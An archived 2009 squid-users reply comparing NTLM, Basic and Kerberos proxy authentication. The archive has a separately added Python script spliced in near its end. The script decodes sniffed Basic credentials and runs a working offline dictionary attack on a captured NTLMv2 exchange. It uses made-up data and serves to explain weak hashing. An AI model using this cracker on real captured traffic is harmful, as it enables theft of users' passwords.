Re: [squid-users] Security of NTLM authentication

From: Guido Serassio <guido.serassio_at_acmeconsulting.it>
Date: Wed, 03 Jun 2009 14:54:43 +0200

Hi,

At 01.59 03/06/2009, Amos Jeffries wrote:
>On Tue, 02 Jun 2009 19:44:03 -0300, Leonardo Rodrigues
><leolistas_at_solutti.com.br> wrote:
> > Hello Guys,
> >
> > a simple question ..... I know that basic authentication schemas
> > transmit username/password in cleartext over the wire. It's base64
> > encoded, but it's trivially detected and decoded, which makes them not
> > the most secure ones to use.
> >
> > Are NTLM authentication schemas more secure than basic ones? I
> > mean, does the NTLM authentication schema transmit cleartext (or simply
> > encoded) usernames/passwords over the wire?
>
>NTLM uses a side channel directly between the domain control server and the
>machine needing to check auth. I'm not sure how that is coded. The HTTP
>side of the triangle includes a hash of the credentials.
>
>One thing to be wary of is that NTLM hash strength is pretty much limited
>by the Windows releases involved. The older versions used by Win9x are
>hashes which are now trivially broken, none are completely secure. The
>latest windows releases have deprecated it in favor of the much more secure
>Kerberos (but that won't work with anything much older than XP and IE6).

Just some more explanation here:

There are two flavors of NTLM: V1 (the Windows 9x version) and V2.
Squid is able to use both, but V2 is more secure.

On the Kerberos side, you need the "negotiate" authentication schema,
but there are some requirements to meet:
Browser:
- Internet Explorer 7.0 or later
- Firefox 1.5 or later
OS:
- Windows 2000 or later

So on Windows 2000 you can use Negotiate with Firefox only, while on
XP/2003 you need to install at least IE7 or Firefox.

Regards

Guido

-
========================================================
Guido Serassio
Acme Consulting S.r.l. - Microsoft Certified Partner
Via Lucia Savarino, 1 10098 - Rivoli (TO) - ITALY
Tel. : +39.011.9530135 Fax. : +39.011.9781115
Email: guido.serassio_at_acmeconsulting.it
WWW: http://www.acmeconsulting.it/
Received on Wed Jun 03 2009 - 12:55:07 MDT
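The thread above contrasts what a sniffer sees with Basic (base64 of "user:password") and with NTLM (a challenge-response derived from a password hash). The following is an added example, not code from the squid-users thread, from Squid, or from any of the posters: it decodes a captured Basic credential, then computes the NTLMv2 proof exactly as a client would and runs an offline dictionary attack against that captured proof, which is the practical meaning of Amos's remark that the NTLM hashes are weak rather than "secure". The user name, domain, password, server and client challenges and timestamp are constructed for the example; the blob carries an empty AV-pair list, a simplification of what a real Windows client sends; MD4 is implemented in pure Python because hashlib's md4 lives in OpenSSL's legacy provider and is often unavailable.

```python
"""Basic vs NTLMv2 on the wire: what a proxy-side capture gives an attacker.

Added example (not code from the squid-users thread or from Squid).
All credentials, challenges and the timestamp below are constructed.
"""
import base64
import hashlib
import hmac
import struct

MASK = 0xFFFFFFFF


def _rotl(x, n):
    return ((x << n) | (x >> (32 - n))) & MASK


def md4(data: bytes) -> bytes:
    """RFC 1320 MD4 in pure Python (needed for the NT hash)."""
    A, B, C, D = 0x67452301, 0xEFCDAB89, 0x98BADCFE, 0x10325476
    bit_len = len(data) * 8
    data += b"\x80"
    data += b"\x00" * ((56 - len(data) % 64) % 64)
    data += struct.pack("<Q", bit_len)
    F = lambda x, y, z: (x & y) | (~x & z)
    G = lambda x, y, z: (x & y) | (x & z) | (y & z)
    H = lambda x, y, z: x ^ y ^ z
    rounds = (
        (F, 0x00000000, list(range(16)), (3, 7, 11, 19)),
        (G, 0x5A827999, [0, 4, 8, 12, 1, 5, 9, 13, 2, 6, 10, 14, 3, 7, 11, 15], (3, 5, 9, 13)),
        (H, 0x6ED9EBA1, [0, 8, 4, 12, 2, 10, 6, 14, 1, 9, 5, 13, 3, 11, 7, 15], (3, 9, 11, 15)),
    )
    for off in range(0, len(data), 64):
        X = struct.unpack("<16I", data[off:off + 64])
        a, b, c, d = A, B, C, D
        for fn, k, order, shifts in rounds:
            for i, idx in enumerate(order):
                t = (a + fn(b, c, d) + X[idx] + k) & MASK
                a, b, c, d = d, _rotl(t, shifts[i % 4]), b, c
        A, B, C, D = (A + a) & MASK, (B + b) & MASK, (C + c) & MASK, (D + d) & MASK
    return struct.pack("<4I", A, B, C, D)


def nt_hash(password: str) -> bytes:
    """NTOWF: MD4 over the UTF-16LE password. Unsalted, so it is a password equivalent."""
    return md4(password.encode("utf-16-le"))


def ntlmv2_hash(password: str, user: str, domain: str) -> bytes:
    """NTOWFv2 = HMAC-MD5(NT hash, UPPER(user) + domain), both UTF-16LE."""
    return hmac.new(nt_hash(password), (user.upper() + domain).encode("utf-16-le"), hashlib.md5).digest()


def build_blob(timestamp: int, client_challenge: bytes) -> bytes:
    """Minimal NTLMv2 'temp' blob: version header, FILETIME, client nonce, empty AV-pair list (MsvAvEOL)."""
    return (b"\x01\x01\x00\x00" + b"\x00" * 4 + struct.pack("<Q", timestamp)
            + client_challenge + b"\x00" * 4 + b"\x00\x00\x00\x00" + b"\x00" * 4)


def ntlmv2_proof(password: str, user: str, domain: str, server_challenge: bytes, blob: bytes) -> bytes:
    """NTProofStr: the 16 bytes the client actually puts in its Type 3 (authenticate) message."""
    return hmac.new(ntlmv2_hash(password, user, domain), server_challenge + blob, hashlib.md5).digest()


def decode_basic(header_value: str):
    """Basic: the credential is recoverable from the header alone."""
    scheme, _, token = header_value.strip().partition(" ")
    if scheme.lower() != "basic":
        raise ValueError("not a Basic credential")
    user, _, password = base64.b64decode(token).decode("utf-8").partition(":")
    return user, password


def crack_ntlmv2(user, domain, server_challenge, blob, proof, wordlist):
    """Offline dictionary attack on a captured NTLMv2 exchange; returns the password or None."""
    for guess in wordlist:
        if hmac.compare_digest(ntlmv2_proof(guess, user, domain, server_challenge, blob), proof):
            return guess
    return None


if __name__ == "__main__":
    # Basic: sniff the Proxy-Authorization header and you are done.
    print(decode_basic("Basic " + base64.b64encode(b"alice:S3cret!").decode()))

    # NTLMv2: the password never crosses the wire, but the captured challenge, blob
    # and proof are enough to test guesses offline at HMAC-MD5 speed.
    chal = bytes.fromhex("0123456789abcdef")                       # constructed server challenge
    blob = build_blob(0x01C9E44B8A2F3C00, bytes.fromhex("aabbccddeeff0011"))
    wire_proof = ntlmv2_proof("S3cret!", "alice", "CORP", chal, blob)
    print(crack_ntlmv2("alice", "CORP", chal, blob, wire_proof, ["password", "letmein", "S3cret!"]))
```

The point of the second half is that NTLM's advantage over Basic is only that a passive sniffer needs a password-guessing loop instead of a base64 decoder; the hashes are unsalted and fast, so weak passwords still fall. NTLMv1, which Amos notes the Win9x generation is limited to, is weaker again, and Kerberos via Negotiate avoids sending a password-derived proof to the proxy at all.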

This archive was generated by hypermail 2.2.0 : Wed Jun 03 2009 - 12:00:02 MDT